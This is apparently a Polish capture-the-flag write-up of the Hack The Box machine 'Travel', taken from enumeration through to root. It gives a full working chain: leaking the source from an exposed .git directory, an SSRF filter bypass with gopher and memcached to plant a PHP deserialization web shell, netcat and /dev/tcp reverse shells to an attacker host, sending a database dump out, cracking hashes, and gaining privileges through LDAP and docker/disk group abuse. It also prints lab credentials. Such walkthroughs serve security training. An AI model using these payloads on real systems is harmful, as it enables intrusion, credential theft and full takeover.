Travel

Nmap

nmap -sC -sV -p- -T5 -Pn 10.10.10.189        
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 17:54 BST
Nmap scan report for travel.htb (10.10.10.189)
Host is up, received user-set (0.10s latency).
Not shown: 65532 closed ports
Reason: 65532 resets
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     syn-ack ttl 62 nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open  ssl/http syn-ack ttl 62 nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after:  2030-04-21T19:24:29
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

USER

Widać, że są dodatkowe domeny które trzeba dodać do /etc/hosts
blog.travel.htb
blog-dev.travel.htb

python3 /opt/dirsearch/dirsearch.py -u http://travel.htb -t 10 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -e txt,php,html


[18:03:52] Starting: 
[18:04:54] 301 -  170B  - /css  ->  http://travel.htb/css/
[18:05:36] 301 -  170B  - /img  ->  http://travel.htb/img/
[18:05:44] 301 -  170B  - /js  ->  http://travel.htb/js/
[18:05:50] 301 -  170B  - /lib  ->  http://travel.htb/lib/
[18:06:09] 301 -  170B  - /newsfeed  ->  http://travel.htb/newsfeed/
python3 /opt/dirsearch/dirsearch.py -u http://blog.travel.htb -t 10 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -e txt,php,html


Target: http://blog.travel.htb

[18:09:54] Starting: 
[18:09:55] 301 -    0B  - /%21  ->  http://blog.travel.htb/
[18:09:56] 301 -    0B  - /0  ->  http://blog.travel.htb/0/
[18:09:56] 301 -    0B  - /0000  ->  http://blog.travel.htb/0000/
[18:10:13] 301 -    0B  - /2020  ->  http://blog.travel.htb/2020/
[18:10:46] 301 -    0B  - /A  ->  http://blog.travel.htb/awesome-rss/
[18:10:49] 301 -    0B  - /H  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:11:24] 301 -    0B  - /a  ->  http://blog.travel.htb/awesome-rss/
[18:11:42] 302 -    0B  - /admin  ->  http://blog.travel.htb/wp-admin/
[18:12:34] 301 -    0B  - /asdfjkl%3B  ->  http://blog.travel.htb/asdfjkl
[18:12:45] 301 -    0B  - /atom  ->  http://blog.travel.htb/feed/atom/
[18:12:55] 301 -    0B  - /aw  ->  http://blog.travel.htb/awesome-rss/
[18:12:55] 301 -    0B  - /awesome  ->  http://blog.travel.htb/awesome-rss/
[18:15:58] 302 -    0B  - /dashboard  ->  http://blog.travel.htb/wp-admin/
[18:17:14] 301 -    0B  - /embed  ->  http://blog.travel.htb/embed/
[18:17:55] 302 -    0B  - /favicon.ico  ->  http://blog.travel.htb/wp-admin/images/w-logo-blue.png
[18:17:57] 301 -    0B  - /feed  ->  http://blog.travel.htb/feed/
[18:18:10] 301 -    0B  - /fixed%21  ->  http://blog.travel.htb/fixed
[18:19:25] 301 -    0B  - /h  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:31] 301 -    0B  - /he  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hello-world  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hell  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hello  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:22:25] 302 -    0B  - /login  ->  http://blog.travel.htb/wp-login.php
[18:25:10] 301 -    0B  - /page1  ->  http://blog.travel.htb/
[18:27:07] 301 -    0B  - /rdf  ->  http://blog.travel.htb/feed/rdf/
[18:27:44] 200 -   67B  - /robots.txt
[18:27:52] 301 -    0B  - /rss  ->  http://blog.travel.htb/feed/
[18:27:52] 301 -    0B  - /rss2  ->  http://blog.travel.htb/feed/
[18:28:39] 403 -  280B  - /server-status
[18:31:19] 301 -    0B  - /transmissio%20%20  ->  http://blog.travel.htb/transmissio
[18:33:18] 301 -  321B  - /wp-admin  ->  http://blog.travel.htb/wp-admin/
[18:33:18] 301 -  323B  - /wp-content  ->  http://blog.travel.htb/wp-content/
[18:33:19] 301 -  324B  - /wp-includes  ->  http://blog.travel.htb/wp-includes/
[18:33:51] 301 -    0B  - /~a  ->  http://blog.travel.htb/awesome-rss/

W sumie trochę znalazło ale na dłuższą metę nie wiadomo co… szperam dalej po internecie i widzę artykuł o projektach gita i strukturze katalogowej

https://medium.com/swlh/hacking-git-directories-e0e60fa79a36

po lekkim szperaniu znajdujesz
http://blog-dev.travel.htb/.git/HEAD
w którym w sumie nie ma nic ciekawego.

Do ściągnięcia projektu używamy GitTools

./gitdumper.sh http://blog-dev.travel.htb/.git/ ~/htb/travel/git

tree                                                                                                                                                                                                  (master) 
.
├── COMMIT_EDITMSG
├── config
├── description
├── HEAD
├── index
├── info
│   └── exclude
├── logs
│   ├── HEAD
│   └── refs
│       ├── heads
│       │   └── master
│       └── remotes
│           └── origin
├── objects
│   ├── 00
│   ├── 03
│   │   └── 13850ae948d71767aff2cc8cc0f87a0feeef63
│   ├── 2b
│   │   └── 1869f5a2d50f0ede787af91b3ff376efb7b039
│   ├── 30
│   │   └── b6f36ec80e8bc96451e47c49597fdd64cee2da
│   ├── b0
│   │   └── 2b083f68102c4d62c49ed3c99ccbb31632ae9f
│   ├── ed
│   │   └── 116c7c7c51645f1e8a403bcec44873f74208e9
│   └── info
└── refs
    ├── heads
    │   └── master
    ├── remotes
    │   └── origin
    └── wip
        ├── index
        │   └── refs
        │       └── heads
        └── wtree
            └── refs
                └── heads

25 directories, 14 files
.git/logs/HEAD

0000000000000000000000000000000000000000 0313850ae948d71767aff2cc8cc0f87a0feeef63 jane <jane@travel.htb> 1587458094 -0700    commit (initial): moved to git
git cat-file -p master                                                                                                                                                                                (master) 
tree b02b083f68102c4d62c49ed3c99ccbb31632ae9f
author jane <jane@travel.htb> 1587458094 -0700
committer jane <jane@travel.htb> 1587458094 -0700
git cat-file -p b02b083f68102c4d62c49ed3c99ccbb31632ae9f                                                                                                                                              (master) 
100755 blob ed116c7c7c51645f1e8a403bcec44873f74208e9	README.md
100755 blob 2b1869f5a2d50f0ede787af91b3ff376efb7b039	rss_template.php
100755 blob 30b6f36ec80e8bc96451e47c49597fdd64cee2da	template.php
git cat-file -p ed116c7c7c51645f1e8a403bcec44873f74208e9                                                                                                                                            (master) 
# Rss Template Extension

Allows rss-feeds to be shown on a custom wordpress page.

## Setup

* `git clone https://github.com/WordPress/WordPress.git`
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty` 
* create logs directory in `wp-content/themes/twentytwenty` 
* create page in backend and choose rss_template.php as theme

## Changelog

- temporarily disabled cache compression
- added additional security checks 
- added caching
- added rss template

## ToDo

- finish logging implementation#    
git cat-file -p 2b1869f5a2d50f0ede787af91b3ff376efb7b039                                                                                                                                            (master) 
<?php
/*
Template Name: Awesome RSS
*/
include('template.php');
get_header();
?>

<main class="section-inner">
	<?php
	function get_feed($url){
     require_once ABSPATH . '/wp-includes/class-simplepie.php';	    
     $simplepie = null;	  
     $data = url_get_contents($url);
     if ($url) {
         $simplepie = new SimplePie();
         $simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
         //$simplepie->set_raw_data($data);
         $simplepie->set_feed_url($url);
         $simplepie->init();
         $simplepie->handle_content_type();
         if ($simplepie->error) {
             error_log($simplepie->error);
             $simplepie = null;
             $failed = True;
         }
     } else {
         $failed = True;
     }
     return $simplepie;
 	 }

 	$url = $_SERVER['QUERY_STRING'];
	if(strpos($url, "custom_feed_url") !== false){
		$tmp = (explode("=", $url)); 	
		$url = end($tmp); 	
 	 } else {
 	 	$url = "http://www.travel.htb/newsfeed/customfeed.xml";
 	 }
 	 $feed = get_feed($url); 
     if ($feed->error())
		{
			echo '<div class="sp_errors">' . "\r\n";
			echo '<p>' . htmlspecialchars($feed->error()) . "</p>\r\n";
			echo '</div>' . "\r\n";
		}
		else {
	?>
	<div class="chunk focus">
		<h3 class="header">
		<?php 
			$link = $feed->get_link();
			$title = $feed->get_title();
			if ($link) 
			{ 
				$title = "<a href='$link' title='$title'>$title</a>"; 
			}
			echo $title;
		?>
		</h3>
		<?php echo $feed->get_description(); ?>

	</div>
	<?php foreach($feed->get_items() as $item): ?>
		<div class="chunk">
			<h4><?php if ($item->get_permalink()) echo '<a href="' . $item->get_permalink() . '">'; echo $item->get_title(); if ($item->get_permalink()) echo '</a>'; ?> <span class="footnote"><?php echo $item->get_date('j M Y, g:i a'); ?></span></h4>
			<?php echo $item->get_content(); ?>
			<?php
			if ($enclosure = $item->get_enclosure(0))
			{
				echo '<div align="center">';
				echo '<p>' . $enclosure->embed(array(
					'audio' => './for_the_demo/place_audio.png',
					'video' => './for_the_demo/place_video.png',
					'mediaplayer' => './for_the_demo/mediaplayer.swf',
					'altclass' => 'download'
				)) . '</p>';
				if ($enclosure->get_link() && $enclosure->get_type())
				{
					echo '<p class="footnote" align="center">(' . $enclosure->get_type();
					if ($enclosure->get_size())
					{
						echo '; ' . $enclosure->get_size() . ' MB';
					}
					echo ')</p>';
				}
				if ($enclosure->get_thumbnail())
				{
					echo '<div><img src="' . $enclosure->get_thumbnail() . '" alt="" /></div>';
				}
				echo '</div>';
			}
			?>

		</div>
	<?php endforeach; ?>
<?php } ?>
</main>

<!--
DEBUG
<?php
if (isset($_GET['debug'])){
  include('debug.php');
}
?>
-->

<?php get_template_part( 'template-parts/footer-menus-widgets' ); ?>

<?php
get_footer();
git cat-file -p 30b6f36ec80e8bc96451e47c49597fdd64cee2da                                                                                                                                            (master) 
<?php

/**
 Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
	// this should be secure
	$tmpUrl = urldecode($url);
	if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
	{		
		die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
	}
	if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
	{		
		die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
	}
	$tmp = parse_url($url, PHP_URL_HOST);
	// preventing all localhost access
	if($tmp == "localhost" or $tmp == "127.0.0.1")
	{		
		die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");		
	}
	return $url;
}

function url_get_contents ($url) {
    $url = safe($url);
	$url = escapeshellarg($url);
	$pl = "curl ".$url;
	$output = shell_exec($pl);
    return $output;
}


class TemplateHelper
{

    private $file;
    private $data;

    public function __construct(string $file, string $data)
    {
    	$this->init($file, $data);
    }

    public function __wakeup()
    {
    	$this->init($this->file, $this->data);
    }

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

po analizie kodu PHP widać że jest generowany hash md5

Memcached.php

$this->name = $this->options[‘extras’][‘prefix’] . md5(“$name:$type”);

generujesz “hash” wrzucasz plik z code injection gopherem na stronę na której jest ssrf jednocześnie trzeba obejść filtr adresu 127.0.0.1 przez użycie innej notacji na przykład 0177.0.0.01

http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://0177.0.0.01:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20138%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:8:%22revs.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:33:%22%3C%3Fphp%20echo%20system%28%24_GET%5B%22c%22%5D%29%3B%20%3F%3E%22%3B%7D%0d%0a

możesz sobie wyświetlić co wrzuciłeś

http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php

xct_4e5612ba079c(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) 

żeby wywołać deserializację trzeba wejść na

http://blog.travel.htb/awesome-rss/

Nstępnie korzystasz z wrzuconego pliku i odpalasz revshella

http://blog.travel.htb/wp-content/themes/twentytwenty/logs/revs.php?c=nc%20-e%20/bin/bash%20[IP]%20[PORT]
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

żeby poprawić sobie shella

export SHELL=bash
bash -i >& /dev/tcp/[IP]/[PORT] 0>&1

rlwrap nc -lvp [PORT]

przeglądamy pliki i widzimy credentiale do bazy w plikach konfiguracyjnych wordpressa

www-data@blog:/var/www/html$ cat wp-config.php

...
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );
...

W /opt mamy backup bazy danych który trzeba ściągnąć

www-data@blog:/opt/wordpress$ ls

backup-13-04-2020.sql
nc -l -p [PORT] > baza.sql
nc -w 3 [IP] [PORT]  < backup-13-04-2020.sql
systemctl start mysql
mysql -e "source baza.sql"  -p
fiFtDDV9LYe8Ti
mysql
show DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wp                 |
+--------------------+


MariaDB [(none)]> use wp;
MariaDB [wp]> show tables;
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
MariaDB [wp]> select * from wp_users;

+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login  | user_pass                          | user_nicename | user_email       | user_url         | user_registered     | user_activation_key | user_status | display_name  |
+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+
|  1 | admin       | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/ | admin         | admin@travel.htb | http://localhost | 2020-04-13 13:19:01 |                     |           0 | admin         |
|  2 | lynik-admin | $P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc. | lynik-admin   | lynik@travel.htb |                  | 2020-04-13 13:36:18 |                     |           0 | Lynik Schmidt |
+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+

następnie trzeba złamać hash

hashcat --force -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt

...
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
...

lynik-admin : 1stepcloser

Możemy się logować na usera przez ssh

ssh lynik-admin@travel.htb
cat user.txt
8f95fe7a617***c40c33d634f3

ROOT

Po enumeracji widać, że na maszynie działa LDAP i znajdujemy do niego hasło

lynik-admin@travel:~$ cat .viminfo
...
# Registers:
""1	LINE	0
	BINDPW Theroadlesstraveled
|3,1,1,1,1,0,1587670528,"BINDPW Theroadlesstraveled"
...
lynik-admin@travel:~$ cat .ldaprc 

HOST ldap.travel.htb
BASE dc=travel,dc=htb
BINDDN cn=lynik-admin,dc=travel,dc=htb

można np. enumerować użytkowników LDAP

ldapsearch -x -LLL uid=* -H ldap://ldap.travel.htb -D 'cn=lynik-admin,dc=travel,dc=htb' -w Theroadlesstraveled

 jane
 brian
 frank
 jerry
 lynik
 edward
 eugene
 gloria
 johnny
 louise
 christopher

Po enumeracji dowiadujesz się że możesz dopisać klucze do użytkownika brian i googlowaniu zlajdujesz instrukcję oracle jak modyfikować/uwierzytelniać userów przez klucze ssh w LDAP

–>INSTRUKCJA<--

I tutaj mamy wiele ścieżek do rozwiązania .. pokażę tylko dwie ale jest ich więcej…można sobie poćwiczyć jakie uprawnienia mają “nieużywani” użytkownicy
–>PRZECZYTAJ<--

mianowicie tworzymy jak w instrukcji pliki LDIFF … w pierwszym modyfikujemy / dodajemy dostęp sobie przez ssh do użytkownika brian, a w drugim dodajemy grupę dla użytkownika

plik1.ldiff

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: [SSH PUBLIC KEY]
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik1.ldif

PIERWSZA dodajemy grupę docker(117):

plik2.ldiff

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: uidNumber
uidNumber: 1000
-
replace: gidNumber
gidNumber: 117
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik2.ldif

Po zalogowaniu na użytkownika brian po ssh mamy uprawnienia do grupy docker oraz jako użytkownik trvl-admin

ssh brian@travel.htb

trvl-admin@travel:~$ id -a
uid=1000(trvl-admin) gid=117(docker) groups=117(docker),5000(domainusers)
docker image ls

REPOSITORY            TAG                 IMAGE ID            CREATED             SIZE
nginx                 latest              602e111c06b6        3 weeks ago         127MB
memcached             latest              ac4488374c89        3 weeks ago         82.3MB
blog                  latest              4225bf7c5157        5 weeks ago         981MB
ubuntu                18.04               4e5021d210f6        8 weeks ago         64.2MB
jwilder/nginx-proxy   alpine              a7a1c0b44c8a        3 months ago        54.6MB
osixia/openldap       latest              4c780dfa5f5e        7 months ago        275MB

wykorzystujemy obraz Ubuntu

trvl-admin@travel:~$ docker run -v /root/:/mnt -it 4e5021d210f6

root@0d44b7f4ba64:/# cd /mnt
root@0d44b7f4ba64:/mnt# ls
bin  root.txt  snap
root@0d44b7f4ba64:/mnt# cat root.txt
63af32019600e****6b2a619c39bc

DRUGA dodajemy grupę disk (6)

plik2.ldiff

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: uidNumber
uidNumber: 1000
-
replace: gidNumber
gidNumber: 6
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik2.ldif

Po zalogowaniu na użytkownika brian po ssh mamy uprawnienia do grupy disk oraz jako użytkownik trvl-admin

ssh brian@travel.htb

trvl-admin@travel:~$ id
uid=1000(trvl-admin) gid=6(disk) groups=6(disk),5000(domainusers)
trvl-admin@travel:~$ debugfs /dev/sda2
debugfs 1.45.5 (07-Jan-2020)

debugfs:  cat /root/root.txt
63af320196****2c6b2a619c39bc

Leave a Comment